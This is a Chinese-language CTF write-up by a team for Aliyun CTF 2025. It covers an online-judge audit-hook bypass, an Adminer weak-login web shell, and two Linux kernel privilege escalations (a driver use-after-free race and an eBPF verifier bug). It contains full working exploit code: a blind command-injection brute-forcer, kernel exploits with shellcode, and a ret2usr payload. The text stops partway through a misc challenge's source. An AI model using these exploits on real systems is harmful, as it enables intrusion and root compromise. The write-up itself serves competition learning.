本次 阿里云CTF2025,我们Polaris战队排名第12。

排名 队伍 总分
11 NulL 3108
12 Polaris 2572
13 Ta 2227
14 V&N 1751
15 TeamGipsy 1751
16 Nepnep 1560
17 从容应 1430
18 小酒馆 1403
19 DJB 1251
20 A1natas 1251

Web

ezoj

我们访问 /source 路由,得到该题目的源码如下

import os
import subprocess
import uuid
import json
from flask import Flask, request, jsonify, send_file
from pathlib import Path

app = Flask(__name__)

SUBMISSIONS_PATH = Path("./submissions")
PROBLEMS_PATH = Path("./problems")

SUBMISSIONS_PATH.mkdir(parents=True, exist_ok=True)

CODE_TEMPLATE = """
import sys
import math
import collections
import queue
import heapq
import bisect

def audit_checker(event,args):
    if not event in ["import","time.sleep","builtins.input","builtins.input/result"]:
        raise RuntimeError

sys.addaudithook(audit_checker)
"""

class OJTimeLimitExceed(Exception):
    pass


class OJRuntimeError(Exception):
    pass


@app.route("/")
def index():
    return send_file("static/index.html")


@app.route("/source")
def source():
    return send_file("server.py")


@app.route("/api/problems")
def list_problems():
    problems_dir = PROBLEMS_PATH
    problems = []
    for problem in problems_dir.iterdir():
        problem_config_file = problem / "problem.json"
        if not problem_config_file.exists():
            continue

        problem_config = json.load(problem_config_file.open("r"))
        problem = {
            "problem_id": problem.name,
            "name": problem_config["name"],
            "description": problem_config["description"],
        }
        problems.append(problem)

    problems = sorted(problems, key=lambda x: x["problem_id"])

    problems = {"problems": problems}
    return jsonify(problems), 200


@app.route("/api/submit", methods=["POST"])
def submit_code():
    try:
        data = request.get_json()
        code = data.get("code")
        problem_id = data.get("problem_id")

        if code is None or problem_id is None:
            return (
                jsonify({"status": "ER", "message": "Missing 'code' or 'problem_id'"}),
                400,
            )

        problem_id = str(int(problem_id))
        problem_dir = PROBLEMS_PATH / problem_id
        if not problem_dir.exists():
            return (
                jsonify(
                    {"status": "ER", "message": f"Problem ID {problem_id} not found!"}
                ),
                404,
            )

        code_filename = SUBMISSIONS_PATH / f"submission_{uuid.uuid4()}.py"
        with open(code_filename, "w") as code_file:
            code = CODE_TEMPLATE + code
            code_file.write(code)

        result = judge(code_filename, problem_dir)

        code_filename.unlink()

        return jsonify(result)

    except Exception as e:
        return jsonify({"status": "ER", "message": str(e)}), 500


def judge(code_filename, problem_dir):
    test_files = sorted(problem_dir.glob("*.input"))
    total_tests = len(test_files)
    passed_tests = 0

    try:
        for test_file in test_files:
            input_file = test_file
            expected_output_file = problem_dir / f"{test_file.stem}.output"

            if not expected_output_file.exists():
                continue

            case_passed = run_code(code_filename, input_file, expected_output_file)

            if case_passed:
                passed_tests += 1

        if passed_tests == total_tests:
            return {"status": "AC", "message": f"Accepted"}
        else:
            return {
                "status": "WA",
                "message": f"Wrang Answer: pass({passed_tests}/{total_tests})",
            }
    except OJRuntimeError as e:
        return {"status": "RE", "message": f"Runtime Error: ret={e.args[0]}"}
    except OJTimeLimitExceed:
        return {"status": "TLE", "message": "Time Limit Exceed"}


def run_code(code_filename, input_file, expected_output_file):
    with open(input_file, "r") as infile, open(
        expected_output_file, "r"
    ) as expected_output:
        expected_output_content = expected_output.read().strip()

        process = subprocess.Popen(
            ["python3", code_filename],
            stdin=infile,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True,
        )

        try:
            stdout, stderr = process.communicate(timeout=5)
        except subprocess.TimeoutExpired:
            process.kill()
            raise OJTimeLimitExceed

        if process.returncode != 0:
            raise OJRuntimeError(process.returncode)

        if stdout.strip() == expected_output_content:
            return True
        else:
            return False


if __name__ == "__main__":
    app.run(host="0.0.0.0", port=5000)

关键代码如下

这里定义了一个钩子函数,设置了允许调用事件的白名单

def audit_checker(event,args):
    if not event in ["import","time.sleep","builtins.input","builtins.input/result"]:
        raise RuntimeError

sys.addaudithook(audit_checker)

这里会将我们传递的python代码拼接上钩子函数代码,并创建子进程执行,但主进程返回的结果是两种固定的情况 AC 和 WA

with open(code_filename, "w") as code_file:
            code = CODE_TEMPLATE + code
            code_file.write(code)
……


def judge(code_filename, problem_dir):
……
        if passed_tests == total_tests:
            return {"status": "AC", "message": f"Accepted"}
        else:
            return {
                "status": "WA",
                "message": f"Wrang Answer: pass({passed_tests}/{total_tests})",
            }
……


def run_code(code_filename, input_file, expected_output_file):
……
        process = subprocess.Popen(
            ["python3", code_filename],
            stdin=infile,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True,
        )

这里我们可以使用python的系统底层函数 _posixsubprocess.fork_exec()创建子进程命令执行绕过

_posixsubprocess.fork_exec 是 CPython 内部实现子进程的底层函数,属于 未暴露给标准审计事件 的底层调用。它直接通过系统调用(如 forkexecve)操作,绕过了高层抽象(如 subprocess 模块),因此不会触发类似 "subprocess.Popen" 的审计事件。

这里payload的构造参考了以下文章

https://dummykitty.github.io/python/2023/05/30/pyjail-bypass-07-%E7%BB%95%E8%BF%87-audit-hook.html

由于返回值固定,我们采用基于时间的盲注,逐位爆破flag

exp:

import requests
from requests.exceptions import Timeout

# 配置常量
TARGET_URL = "url/api/submit"
HEADERS = {"Content-Type": "application/json"}
TIMEOUT_LIMIT = 5
CHAR_SET = "qwertyuiopasdfghjklzxcvbnm1234567890{}-"
SLEEP_DURATION = 10  # 用于触发超时的睡眠时间

class FlagBruteforcer:
    def __init__(self):
        self.session = requests.Session()
        self.flag = ""
    
    def _generate_payload(self, char: str) -> str:
        """构造盲注payload"""
        position = len(self.flag) + 1
        return (
            f"if [ $(cat /f* | cut -c {position}) = '{char}' ]; "
            f"then sleep {SLEEP_DURATION}; fi"
        )
    
    def _build_exploit_code(self, payload: str) -> dict:
        """构造包含payload的请求体"""
        return {
            "code": f"""import os
import _posixsubprocess
_posixsubprocess.fork_exec(
    [b"/bin/bash", b"-c", b"{payload}"],
    [b"/bin/bash"],
    True,
    (), None, None, -1, -1, -1, -1, -1, -1, *os.pipe(),
    False, False, False, None, None, None, -1, None, False
)
input_str = input()
a, b = map(int, input_str.split())
print(a - b)""",
            "problem_id": "0"
        }
    
    def _test_character(self, char: str) -> bool:
        """测试单个字符并返回是否触发超时"""
        payload = self._generate_payload(char)
        json_data = self._build_exploit_code(payload)
        
        try:
            response = self.session.post(
                TARGET_URL,
                headers=HEADERS,
                json=json_data,
                timeout=TIMEOUT_LIMIT
            )
            print(f"Response: {response.text}")
            return False
        except Timeout:
            return True
    
    def run(self):
        """主爆破逻辑"""
        while True:
            found = False
            print(f"Current progress: {self.flag}|")
            
            for char in CHAR_SET:
                print(f"Testing: {self.flag}{char}")
                
                if self._test_character(char):
                    self.flag += char
                    found = True
                    print(f"MATCH! Current flag: {self.flag}")
                    break
            
            if not found:
                print(f"flag: {self.flag}")
                break

if __name__ == "__main__":
    bruteforcer = FlagBruteforcer()
    bruteforcer.run()

爆破得到flag

image-20250223151052512

打卡OK

扫描网站目录发现 Adminer 4.8.1 的入口文件 adminer_481.php

image-20250223184459716

进入 url/adminer_481.php,弱口令 root/root 登陆

image-20250223183619803

尝试写入shell

image-20250223183728862

访问我们的shell,发现成功写入

image-20250223183805044

蚁剑连接,在根目录找到flag

image-20250223183921437

PWN

Pwn-alimem

题目给了驱动源码,所以直接进行源码分析。

alimem_ioctl有四个功能点,ALIMEM_ALLOC、ALIMEM_FREE、ALIMEM_WRITE、ALIMEM_READ。

ALIMEM_ALLOC会申请一个page到alimem_page结构体并存入pages数组,并设置该结构体的引用为1。

ALIMEM_FREE则是进行pages[idx]的清空和减引用。

乍一看,逻辑十分严谨,也使用了锁操作,不存在漏洞。

alimem_mmap函数则是会对pages[idx]对应的物理内存进行用户空间的映射,使内核和用户共享一块物理内存,实现高效的数据传输。

这里进行了写调度上锁和解锁的操作,可以看到他这里的解锁时机并不正确,理应在return前进行解锁,却为了减少代码量提前在if判断前进行了解锁操作,后面的加引用发生在了解锁之后,这会引发条件竞争。

我们可以利用竞争,在mmap取完page解锁调度之后,加引用之前,调用ALIMEM_FREE进行指针释放,从而引发uaf。

造成uaf之后,我们可以堆喷file结构体,如下:

再去修改其读写标志位,实现往只读文件写入内容,修改poweroff造成提权。

#include "Kernel.h"


#define ALIMEM_ALLOC 0x1337
#define ALIMEM_FREE 0x1338
#define ALIMEM_WRITE 0x1339
#define ALIMEM_READ 0x133a


struct alimem_write {
    int idx;
    unsigned int offset;
    char * data;
    size_t size;
};

struct alimem_read {
    int idx;
    unsigned int offset;
    char * data;
    size_t size;
};

char buf[0x1000];
long* ibuf = (long*)buf, log = 0;

void kalloc(int fd) {
    if (log) {
        printf("kalloc\n");
    }
    ioctl(fd, ALIMEM_ALLOC, 0);
}

void kfree(int fd, int idx) {
    if (log) {
        printf("kfree %d\n", idx);
    }
    ioctl(fd, ALIMEM_FREE, &idx);
}

void kwrite(int fd, int idx, int off, size_t size, char *buf) {
    struct alimem_write aw = {
        .idx = idx,
        .offset = off,
        .data = buf,
        .size = size,
    };
    ioctl(fd, ALIMEM_WRITE, &aw);
}

void kread(int fd, int idx, int off, size_t size, char* buf) {
    struct alimem_read ar = {
    .idx = idx,
    .offset = off,
    .data = buf,
    .size = size
    };
    ioctl(fd, ALIMEM_READ, &ar);
}

long* addr[64] = { 0 }, stop = 0, t = 0, tt = 0;
int fds[0x200];

void kuaf_1(int fd) {
    int i = 0;
    while (!stop) {
        t = 0;
        tt = 0;
        kalloc(fd);
        ibuf[0] = 0x100;
        kwrite(fd, 0, 0, 0x100, buf);
        t = 1;
        kfree(fd, 0);
        if ((long)addr[0] <= 0) continue;
        ibuf[0] = 0x200;
        kalloc(fd);
        kwrite(fd, 0, 0, 0x100, buf);
        if (addr[0][0] == 0x200) {
            stop = 1;
            tt = 1;
            break;
        }
        kfree(fd, 0);
        tt = 1;
    }
}

void kuaf_2(int fd) {
    int i = 0;
    putchar('\n');
    while (1) {
        while (!t) {};
        addr[0] = (long*)mmap((void*)NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
        if ((long)addr[0] <= 0) {
            continue;
        }
        printf("\r%d", i);
        i++;
        while (!tt) {};
        if (stop) {
            break;
        }
        //munmap(addr[0], 0x1000);
        addr[0] = 0;
    }
    putchar('\n');
}

int main() {
    int fd = open("/dev/alimem",O_RDWR);
    pthread_t pt1, pt2;
    if (pthread_create(&pt1, 0, (void* (*)(void*))kuaf_1, (void*)fd) != 0) {
        perror("pthread 1");
        exit(0);
    }
    if (pthread_create(&pt2, 0, (void* (*)(void*))kuaf_2, (void*)fd)) {
        perror("pthread 2");
        exit(0);
    }
    pthread_join(pt1, 0);
    pthread_join(pt2, 0);

    printf("[+] Stage 1 finished.\n");

    ibuf[0] = 0x300;
    kwrite(fd, 0, 0, 0x100, buf);
    if (addr[0][0] == 0x300) {
        kfree(fd, 0);
        if (addr[0][0] == 0x300) {
            printf("[-] UAF failed.\n");
            exit(0);
        }
        printf("[+] UAF success.\n");
    }
    else {
        printf("[-] UAF failed.\n");
        exit(0);
    }


    binary_dump((char*)addr[0], 0x100, 0);
    
    for (int i = 0; i < 0x200; i++) {
        fds[i] = open("/bin/poweroff", O_RDONLY);
    }
    if (addr[0][0] == 0x300) {
        printf("[-] Spray file failed.\n");
        exit(0);
    }
    printf("[+] Spray file success.\n");
    binary_dump((char*)addr[0], 0x100, 0);
    addr[0][0x10 / 8] = 0x004f801f00000000;
    addr[0][0x48 / 8] = 0x8002;
    binary_dump((char*)addr[0], 0x100, 0);
    for (int i = 0; i < 0x200; i++) {
        unsigned char orw_elfcode[] = { 0x7f,0x45,0x4c,0x46,0x2,0x1,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x3e,0x0,0x1,0x0,0x0,0x0,0x78,0x0,0x40,0x0,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x40,0x0,0x38,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x5,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x0,0x0,0x0,0xb7,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xb7,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x48,0xbf,0x2f,0x66,0x6c,0x61,0x67,0x0,0x0,0x0,0x57,0x48,0x89,0xe7,0x48,0x31,0xf6,0x48,0x31,0xd2,0xb8,0x2,0x0,0x0,0x0,0xf,0x5,0x48,0x89,0xc7,0x48,0x89,0xe6,0xba,0x0,0x1,0x0,0x0,0x48,0x31,0xc0,0xf,0x5,0xbf,0x1,0x0,0x0,0x0,0x48,0x89,0xe6,0xba,0x0,0x1,0x0,0x0,0xb8,0x1,0x0,0x0,0x0,0xf,0x5 };
        write(fds[i], orw_elfcode, sizeof(orw_elfcode));
        close(fds[i]);
    }
    return 0;
}

Pwn-beebee

内核patch题,重点关注patch文件。

可以注意到往内核bpf框架中添加了一个bpf函数。

该函数接收三个参数,参数1和参数3都是一个指向只读内存的指针,参数二是size,这里固定为sizeof(s64)=8.

而该函数的作用则是从指针1指向的内存读取s64类型的数据并异或2025放到指针2指向的内存。

很显然,指针二是只读内存,这样会导致只读内存的修改。

这里需要了解到一点,bpf验证程序verifier在ld只读map时,会进行提前数据载入。

比如,如下bpf指令,此时array_fd对应得map是只读的。

//其中map->value[0] = 0;

struct bpf_insn insns[] = {
        /* save skb_buff. */
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_1, 0),
        
        /* map_lookup_elem, 获取只读数据 */
        BPF_LD_MAP_FD(BPF_REG_1, array_fd),
        BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10, 0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_MOV64_IMM(BPF_REG_3, 0),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, -1),
        BPF_EXIT_INSN(),

        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0, 0),

        BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),
        
        BPF_EXIT_INSN()
};

执行结果如下:

可以看到r7=*(u64 *)(r8+0)这里”; R7_w=0”,verifier直接把r7赋值为map->value[0]=0了,正常情况下只读内存不会改变所以这里verifier和实际run不会有差异。

但aliyunctf_xor_func会对只读内存进行修改,这就导致了两端差异,从而产生漏洞。

/* POC */

int test_vuln() {
    unsigned int ret = 0;
    int array_fd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x40, 1, BPF_F_RDONLY_PROG);
    if (array_fd < 0) {
        error_quit("BPF_MAP_TYPE_ARRAY error");
    }

    int key = 0;
    long v[0x40];
    v[0] = 0;
    int error = bpf_update_elem(array_fd, &key, v, 0);
    if (error < 0) {
        error_quit("BPF_UPDATE_ELEM error");
     
     struct bpf_insn insns[] = {
        /* save skb_buff. */
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_1, 0),
    
        /* map_lookup_elem */
        BPF_LD_MAP_FD(BPF_REG_1, array_fd),
        BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10, 0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_MOV64_IMM(BPF_REG_3, 0),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
    
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, -1),
        BPF_EXIT_INSN(),
    
        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0, 0),
        /* 修改只读map */
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0, 0),
        BPF_MOV64_IMM(BPF_REG_2, 8),
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_0, 0),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_aliyunctf_xor),
    
        /* verifier认为BPF_REG_7的值为原先的0,但实际值为2025 */
        BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),
        /* BPF_REG_7改为1*/
        BPF_ALU64_IMM(BPF_RSH, BPF_REG_7, 10),
        }}

通过如上poc就能构造两端0和1的差异,即verifier认为BPF_REG_7为0,实际运行则为1。

构造两端差异之后就要进行利用了,经过测试发现linux-6.6对bpf指令产生了进一步的优化,涉及指针与明确值寄存器的加减会被优化成指针与立即数的加减,所以直接利用栈指针加减进行栈的越界泄露和修改是很难行得通的。

但查看qemu启动文件,发现啥保护都没开

qemu-system-x86_64  \
-m 512M  \
-smp 2 \
-kernel bzImage    \
-append "console=ttyS0 quiet panic=-1 nokaslr sysctl.kernel.io_uring_disabled=1 sysctl.kernel.dmesg_restrict=1 sysctl.kernel.kptr_restrict=2 sysctl.kernel.unprivileged_bpf_disabled=0"     \
-initrd rootfs.cpio \
-drive file=/flag,if=virtio,format=raw,readonly=on \
-nographic  \
-net nic,model=e1000 \
-no-reboot \
-monitor /dev/null

而bpf函数中有一个函数skb_load_bytes_relative,会将传入的skb包的内容转存到某片内存区域。

参数一就是skb指针,参数二表示基于skb的偏移,参数三表示待写入的内存,参数四表示写入size,参数五为flag。

将变异寄存器7进行乘0x18再加8的操作,再将其作为参数四传递进去,因为verifier认为它是8,所以不会溢出,从而绕过验证,但实际运行为0x20从而造成溢出。

没开保护就直接修改返回地址到用户空间执行提权即可。

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <signal.h>
#include <fcntl.h>
#include "bpf.h"
#define BPF_FUNC_aliyunctf_xor 212
unsigned long user_rip, user_ss, user_sp, user_cs, user_rflags;
void error_quit(const char* msg) {
    perror(msg);
    exit(0);
}

void get_shell() {
    printf("\033[35mGetShell Success!\033[0m\n");
    int fd = open("/flag", 0);
    char flag[0x100] = { 0 };
    read(fd, flag, 0x100);
    puts(flag);
    return;
}

void binary_dump(char* buf, size_t size, long long base_addr) {
    printf("\033[33mDump:\n\033[0m");
    char* ptr;
    for (int i = 0; i < size / 0x20; i++) {
        ptr = buf + i * 0x20;
        printf("0x%016llx:   ", base_addr + i * 0x20);
        for (int j = 0; j < 4; j++) {
            printf("0x%016llx ", *(long long*)(ptr + 8 * j));
        }
        printf("   ");
        for (int j = 0; j < 0x20; j++) {
            printf("%c", isprint(ptr[j]) ? ptr[j] : '.');
        }
        putchar('\n');
    }
    if (size % 0x20 != 0) {
        int k = size - size % 0x20;
        printf("0x%016llx:   ", base_addr + k);
        ptr = buf + k;
        for (int i = 0; i <= (size - k) / 8; i++) {
            printf("0x%016llx ", *(long long*)(ptr + 8 * i));
        }
        for (int i = 0; i < 3 - (size - k) / 8; i++) {
            printf("%19c", ' ');
        }
        printf("   ");
        for (int j = 0; j < size - k; j++) {
            printf("%c", isprint(ptr[j]) ? ptr[j] : '.');
        }
        putchar('\n');
    }
}

void save_user_land() {
    __asm__(
        ".intel_syntax noprefix;"
        "mov user_cs,cs;"
        "mov user_sp,rsp;"
        "mov user_ss,ss;"
        "pushf;"
        "pop user_rflags;"
        ".att_syntax;"
    );
    user_rip = (unsigned long)get_shell;
    puts("\033[34mUser land saved.\033[0m");
    printf("\033[34muser_ss:0x%llx\033[0m\n", user_ss);
    printf("\033[34muser_sp:0x%llx\033[0m\n", user_sp);
    printf("\033[34muser_rflags:0x%llx\033[0m\n", user_rflags);
    printf("\033[34muser_cs:0x%llx\033[0m\n", user_cs);
    printf("\033[34muser_rip:0x%llx\033[0m\n", user_rip);
}

void circle_print(char buf[], int line_size, int size) {
    int l = 0;
    for (int i = 0; i < size; i++, l++) {
        putchar(buf[i]);
        if (buf[i] == '\n')
            l = 0;
        if ((l + 1) % line_size == 0) {
            putchar('\n');
        }
    }
}

unsigned long prepare_kernel_cred = 0xffffffff810c3f00,
commit_creds = 0xffffffff810c3c50, init_cred = 0xffffffff82a0c900;

void privilege_imporve() {
    __asm__(
        ".intel_syntax noprefix;"
        "mov rdi,init_cred;"
        "mov rax,prepare_kernel_cred;"
        "call rax;"
        "mov rdi,rax;"
        "mov rax,commit_creds;"
        "call rax;"
        "xor rax,rax;"
        "swapgs;"
        "mov r15,user_ss;"
        "push r15;"
        "mov r15,user_sp;"
        "push r15;"
        "mov r15,user_rflags;"
        "push r15;"
        "mov r15,user_cs;"
        "push r15;"
        "mov r15,user_rip;"
        "push r15;"
        "iretq;"
        ".att_syntax;"
    );
}

unsigned char stack[0x4000];

int test_vuln() {
    unsigned int ret = 0;
    int array_fd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x40, 1, BPF_F_RDONLY_PROG);
    if (array_fd < 0) {
        error_quit("BPF_MAP_TYPE_ARRAY error");
    }

    int key = 0;
    long v[0x40];
    v[0] = 0;
    int error = bpf_update_elem(array_fd, &key, v, 0);
    if (error < 0) {
        error_quit("BPF_UPDATE_ELEM error");
    }

     error = bpf_map_freeze(array_fd);
     if (error < 0){
         error_quit("BPF_MAP_FREEZE error");
     }

     struct bpf_insn insns[] = {
        /* 保存 skb_buff. */
        BPF_MOV64_REG(BPF_REG_9, BPF_REG_1, 0),

        /* map_lookup_elem, 获取只读数据 */
        BPF_LD_MAP_FD(BPF_REG_1, array_fd),
        BPF_ST_MEM(BPF_DW, BPF_REG_10, -8, 0),
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10, 0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),
        BPF_MOV64_IMM(BPF_REG_3, 0),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),

        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
        BPF_MOV64_IMM(BPF_REG_0, -1),
        BPF_EXIT_INSN(),

        BPF_MOV64_REG(BPF_REG_8, BPF_REG_0, 0),

        /* 利用aliyunctf_xor修改只读数据 */
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_0, 0),
        BPF_MOV64_IMM(BPF_REG_2, 8),
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_0, 0),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_aliyunctf_xor),

        /* 构造verifier差异 0 -> 1*/
        BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0),
        BPF_ALU64_IMM(BPF_RSH, BPF_REG_7, 10),

        /* 0 -> any */
        BPF_ALU64_IMM(BPF_MUL, BPF_REG_7, 0x18),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 8),

        // r0 = bpf_skb_load_bytes_relative(r9, 0, r8, r7, 0)
        BPF_MOV64_REG(BPF_REG_1, BPF_REG_9, 0),
        BPF_MOV64_IMM(BPF_REG_2, 0),
        BPF_MOV64_REG(BPF_REG_3, BPF_REG_10, 0),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -0x10),
        BPF_MOV64_REG(BPF_REG_4, BPF_REG_7, 0),
        BPF_MOV64_IMM(BPF_REG_5, 1),
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes_relative),

        BPF_EXIT_INSN()

    };
    int prog_fd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insns, sizeof(insns) / sizeof(insns[0]), "");
    circle_print(bpf_log_buf, 165, strlen(bpf_log_buf));
    if (prog_fd < 0)
        error_quit("BPF_PROG_LOAD error");

    char buf[0x100] = { 0 };
    ((long*)&buf[14])[3] = (long)privilege_imporve;
    unsigned int size_out = 0;
    bpf_prog_test_run(prog_fd, 0, buf, 0x100, buf, &size_out, &ret, NULL);

    return ret;
}


int main() {
    save_user_land();
    signal(SIGSEGV, get_shell);
    printf("ret: 0x%x\n", test_vuln()),
    printf("End.\n");
}

MISC

mba

server.py

#!/usr/bin/env python3

from lark import Lark, Transformer
from typing import Any, List, Tuple, Self
import z3, os

BITSET = {
  'x': [0, 0, 1, 1],
  'y': [0, 1, 0, 1],
}

Rule = r"""
?start: expr -> expression

?expr: coterm -> coefterm
    | expr "+" coterm -> add
    | expr "-" coterm -> sub

?coterm: term -> term
    | integer "*" term -> mul             
    | integer -> const
              
?term: "(" term ")"
    | "~" "(" term ")" -> bnot_term
    | factor "&" factor -> band
    | factor "|" factor -> bor
    | factor "^" factor -> bxor
    | factor -> single
              
?factor: "x" -> x
    | "y" -> y
    | "~" factor -> bnot

?integer: /\d{1,8}/

%import common.WS
%ignore WS           
"""

P = Lark(Rule, parser='lalr', start='start')
PT = Lark(Rule, parser='lalr', start='term')

class MBATransformer(Transformer):
  def expression(self, args):
    return MBAExpr(args[0])

  def coefterm(self, args):
    return [args[0]]

  def add(self, args):
    return args[0] + [args[1]]

  def sub(self, args):
    new_arg = (-args[1][0], args[1][1])
    return args[0] + [new_arg]

  def term(self, args):
    return (1, args[0])

  def mul(self, args):
    num = int(args[0])
    return (num, args[1])

  def const(self, args):
    num = int(args[0])
    return (-num, BoolFunction('&', ['x', '~x'], True))
  
  def bnot_term(self, args):
    return args[0].invert()

  def band(self, args):
    return BoolFunction('&', args)

  def bor(self, args):
    return BoolFunction('|', args)

  def bxor(self, args):
    return BoolFunction('^', args)
  
  def single(self, args):
    return BoolFunction(None, args)

  def x(self, args):
    return 'x'

  def y(self, args):
    return 'y'

  def bnot(self, args):
    if args[0] == 'x' or args[0] == 'y':
      return '~' + args[0]
    assert args[0][0] == '~', "Invalid expression"
    return args[0][1]   # double negation
  
  def integer(self, args):
    return args[0]

boolean = lambda x: 1 if x else 0
def _handle_uop(op: str, a: List[int] | int) -> List[int] | int:
  if op != '~':
    raise ValueError("Invalid unary operator")
  if isinstance(a, int):
    return boolean(1 if a == 0 else 0)
  return [boolean(1 if x == 0 else 0) for x in a]

def _get_bitvec(s: str, nbits: int) -> z3.BitVec:
  return z3.BitVec(s, nbits)

def _get_bitvecval(v: int, nbits: int) -> z3.BitVecVal:
  return z3.BitVecVal(v, nbits)

class BoolFunction(object):
  def __init__(self, op: str | None, args: List[str], inverted: bool = False):
    if op is not None:
      assert len(args) == 2, "Binary operator must have two arguments"
    else:
      assert len(args) == 1, "A bool function must have at least one argument"
      if inverted and args[0] == '~':   # double neg
        inverted = False
        args = [args[0][1]]
    self.op = op
    self.args = args
    self.inverted = inverted

  def __str__(self):
    if self.op is not None:
      s = "(" + self.op.join(self.args) + ")"
    else:
      s = self.args[0]  
    
    if self.inverted:
      return f"~{s}"
    return s
  
  def __repr__(self):
    return str(self)
  
  def _get_arg_symbol(self, s: str) -> str:
    if s[0] != '~':
      return s
    return s[1]
  
  def _get_bitset(self, s: str) -> List[int]:
    if s[0] != '~':
      return BITSET[s]
    return _handle_uop('~', self._get_bitset(s[1]))
  
  def _eval_arg(self, s: str, x: int, y: int) -> int:
    bitset = {'x': x, 'y': y}
    if s[0] != '~':
      return bitset[s]
    return _handle_uop('~', bitset[s[1]])
  
  def invert(self) -> Self:
    return BoolFunction(self.op, self.args, not self.inverted)
  
  def _get_arg_z3expr(self, s: str, nbits: int) -> z3.BitVecRef:
    if s[0] != '~':
      return _get_bitvec(s, nbits)
    return ~(_get_bitvec(s[1], nbits))
  
  def to_z3expr(self, nbits: int) -> Any:
    if not self.op:
      arg_expr = self._get_arg_z3expr(self.args[0], nbits)
      if self.inverted:
        return ~arg_expr
      return arg_expr
    
    a = self._get_arg_z3expr(self.args[0], nbits)
    b = self._get_arg_z3expr(self.args[1], nbits)
    if self.op == '&':
      expr = a & b
    elif self.op == '|':
      expr = a | b
    elif self.op == '^':
      expr = a ^ b
    else:
      raise ValueError("Invalid operator")

    if self.inverted:
      return ~expr
    return expr
    
class MBAExpr(object):
  def __init__(self, coterms: List[Tuple[int, BoolFunction]]):
    self._coterms = coterms

  def __len__(self):
    return len(self._coterms)
  
  def __getitem__(self, i: int) -> Tuple[int, BoolFunction]:
    return self._coterms[i]
  
  def __setitem__(self, i: int, v: Tuple[int, BoolFunction] | BoolFunction):
    coef = self._coterms[i][0]
    if isinstance(v, BoolFunction):
      self._coterms[i] = (coef, v)
    else:
      self._coterms[i] = v

  def __str__(self):
    r = ""
    for c, t in self._coterms:
      if c < 0:
        r += f"-{abs(c)}*{t}"
      else:
        r += f"+{c}*{t}"
    return r
  
  def __repr__(self):
    return str(self)
  
  def to_z3expr(self, nbits: int) -> z3.BitVecRef:
    expr = 0
    for c, t in self._coterms:
      expr += _get_bitvecval(c, nbits) * t.to_z3expr(nbits)
    return expr
  
  @property
  def coterms(self) -> List[Tuple[int, BoolFunction]]:
    return self._coterms

T = MBATransformer()
def parse(expr: str) -> MBAExpr:
  return T.transform(P.parse(expr))

def parse_term(term: str) -> BoolFunction:
  return T.transform(PT.parse(term))

def check_expression(t: z3.Tactic, e: MBAExpr) -> bool:
  expr = e.to_z3expr(64)
  s = t.solver()
  s.add(expr != expr)

  s.set('timeout', 30000)   # 30 seconds
  r = s.check()
  if r == z3.unknown:
    print("Solver timed out")
    exit(1)
  return r == z3.unsat

def serve_challenge():
  FLAG = os.environ.get('FLAG', 'aliyunctf{this_is_a_test_flag}')

  expr = input("Please enter the expression: ")
  if len(expr) > 200:
    print("Expression is too long")
    exit(1)

  try:
    mba = parse(expr)
  except Exception as e:
    print("Could not parse the expression")
    exit(1)

  if len(mba.coterms) > 15:
    print("Too many terms")
    exit(1)

  t = z3.Then(
